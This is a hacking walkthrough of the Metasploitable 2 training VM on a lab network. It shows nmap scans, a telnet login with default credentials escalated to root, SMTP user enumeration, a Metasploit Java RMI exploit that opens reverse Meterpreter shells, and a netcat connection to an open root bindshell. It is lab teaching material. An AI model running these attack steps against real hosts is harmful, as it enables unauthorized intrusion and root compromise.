Metasploitable: 2 – Walkthrough

Metasploitable 2 is nice challenge to test all vulnerable with metasploit tool. Really sample and nice tricks to get the root with vulnerable version of system.
let’s get start.

┌─[[email protected]]─[~]
└──> nmap 192.168.1.* -sn -n

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-09 17:33 +0630
Nmap scan report for 192.168.1.1
Host is up (0.0014s latency).
MAC Address: 60:E3:27:BE:75:78 (Tp-link Technologies)
Nmap scan report for 192.168.1.72
Host is up (0.0017s latency).
MAC Address: CC:AF:78:50:24:00 (Hon Hai Precision Ind.)
Nmap scan report for 192.168.1.73
Host is up (0.00027s latency).
MAC Address: 00:0C:29:C7:95:E6 (VMware)
Nmap scan report for 192.168.1.100
Host is up (0.00013s latency).
MAC Address: 34:97:F6:C3:0B:66 (Asustek Computer)
Nmap scan report for 192.168.1.101
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.49 seconds

I start Nmap scanning so that to know the target IP of VM. Now VMware is running on 192.168.1.73. Nmap again to know open ports.

┌─[[email protected]]─[~]
└──> nmap -sV -p- 192.168.1.73

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-09 17:36 +0630
Nmap scan report for kioptrix3.com (192.168.1.73)
Host is up (0.0016s latency).
Not shown: 65505 closed ports
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
53/tcp    open  domain      ISC BIND 9.4.2
80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp   open  rpcbind     2 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login?
514/tcp   open  tcpwrapped
1099/tcp  open  rmiregistry GNU Classpath grmiregistry
1524/tcp  open  shell       Metasploitable root shell
2049/tcp  open  nfs         2-4 (RPC #100003)
2121/tcp  open  ftp         ProFTPD 1.3.1
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5
3632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp  open  vnc         VNC (protocol 3.3)
6000/tcp  open  X11         (access denied)
6667/tcp  open  irc         UnrealIRCd
6697/tcp  open  irc         UnrealIRCd
8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
51268/tcp open  rmiregistry GNU Classpath grmiregistry
51834/tcp open  mountd      1-3 (RPC #100005)
53124/tcp open  status      1 (RPC #100024)
60448/tcp open  nlockmgr    1-4 (RPC #100021)
MAC Address: 00:0C:29:C7:95:E6 (VMware)
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 127.90 seconds

Awesome,There are many service are running.So may be there have many vulnerables. Let’s exploit from top to bottom.

First vsftpd version is 2.3.4. I find version number on the google to know it exploitable or not.

https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor

Yes. I can be exploit with metasploit. Let’s try.


Own!. Next.

OpenSSH 4.7p1 is also vulnerable

https://charlesreid1.com/wiki/Metasploitable/SSH/Exploits


Got root? done. Next.

Telnet also vulnerable with description info.

┌─[[email protected]]─[~]
└──> telnet 192.168.1.73
Trying 192.168.1.73...
Connected to 192.168.1.73.
Escape character is '^]'.
                _                  _       _ _        _     _      ____  
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ 
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ 
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
                            |_|                                          


Warning: Never expose this VM to an untrusted network!

Contact: msfdev[at]metasploit.com

Login with msfadmin/msfadmin to get started


metasploitable login: msfadmin
Password: 
Last login: Tue Jan  9 05:44:13 EST 2018 from 192.168.1.101 on pts/1
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
[email protected]:~$ sudo -s
[sudo] password for msfadmin: 
[email protected]:~# id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:~#

Next SMTP user enumeration

msf > use exploit/linux/misc/gld_postfix
msf exploit(linux/misc/gld_postfix) > show options

Module options (exploit/linux/misc/gld_postfix):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  2525             yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   RedHat Linux 7.0 (Guinness)


msf exploit(linux/misc/gld_postfix) > set RHOST 192.168.1.73
RHOST => 192.168.1.73
msf exploit(linux/misc/gld_postfix) > run

[*] Started reverse TCP handler on 192.168.1.101:4444 
[-] 192.168.1.73:2525 - Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (192.168.1.73:2525).
[*] Exploit completed, but no session was created.
msf exploit(linux/misc/gld_postfix) > use auxiliary/scanner/smtp/smtp_enum
msf auxiliary(scanner/smtp/smtp_enum) > set RHOSTS 192.168.1.73
RHOSTS => 192.168.1.73
msf auxiliary(scanner/smtp/smtp_enum) > run

[*] 192.168.1.73:25       - 192.168.1.73:25 Banner: 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
[+] 192.168.1.73:25       - 192.168.1.73:25 Users found: , backup, bin, daemon, distccd, ftp, games, gnats, irc, libuuid, list, lp, mail, man, news, nobody, postgres, postmaster, proxy, service, sshd, sync, sys, syslog, user, uucp, www-data
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Next Samba smbd 3.X, it can be exploit but i don’t show in this walkthrough because it already write at the last one.

Next GNU Classpath, 😉

msf auxiliary(scanner/smtp/smtp_enum) > use exploit/multi/misc/java_rmi_server
msf exploit(multi/misc/java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request
   RHOST                       yes       The target address
   RPORT      1099             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)


msf exploit(multi/misc/java_rmi_server) > set RHOST 192.168.1.73
RHOST => 192.168.1.73
msf exploit(multi/misc/java_rmi_server) > run

[*] Started reverse TCP handler on 192.168.1.101:4444 
[*] 192.168.1.73:1099 - Using URL: http://0.0.0.0:8080/wKNQ8aS6geYU
[*] 192.168.1.73:1099 - Local IP: http://192.168.1.101:8080/wKNQ8aS6geYU
[*] 192.168.1.73:1099 - Server started.
[*] 192.168.1.73:1099 - Sending RMI Header...
[*] 192.168.1.73:1099 - Sending RMI Call...
[*] 192.168.1.73:1099 - Replied to request for payload JAR
[*] Sending stage (53837 bytes) to 192.168.1.73
[*] Meterpreter session 1 opened (192.168.1.101:4444 -> 192.168.1.73:36318) at 2018-01-09 18:53:38 +0630
id
[-] 192.168.1.73:1099 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request
[*] 192.168.1.73:1099 - Server stopped.
[*] Exploit completed, but no session was created.
msf exploit(multi/misc/java_rmi_server) > id
[*] exec: id

uid=0(root) gid=0(root) groups=0(root)
msf exploit(multi/misc/java_rmi_server) > run

[*] Started reverse TCP handler on 192.168.1.101:4444 
[*] 192.168.1.73:1099 - Using URL: http://0.0.0.0:8080/iSyb4JDXRzhA5h
[*] 192.168.1.73:1099 - Local IP: http://192.168.1.101:8080/iSyb4JDXRzhA5h
[*] 192.168.1.73:1099 - Server started.
[*] 192.168.1.73:1099 - Sending RMI Header...
[*] 192.168.1.73:1099 - Sending RMI Call...
[*] 192.168.1.73:1099 - Replied to request for payload JAR
[*] Sending stage (53837 bytes) to 192.168.1.73
[*] Meterpreter session 2 opened (192.168.1.101:4444 -> 192.168.1.73:33132) at 2018-01-09 18:53:58 +0630
^C[-] 192.168.1.73:1099 - Exploit failed: Interrupt 
[*] 192.168.1.73:1099 - Server stopped.
[*] Exploit completed, but no session was created.
msf exploit(multi/misc/java_rmi_server) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 1 created.
Channel 1 created.
id
uid=0(root) gid=0(root)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Got root!. Next shell connection

┌─[[email protected]]─[~]
└──> nc 192.168.1.73 1524
[email protected]:/# id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:/# uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
[email protected]:/# 

Woot! Thanks for reading. Happy Hacking..

PS – There are many exploit methods. Good luck.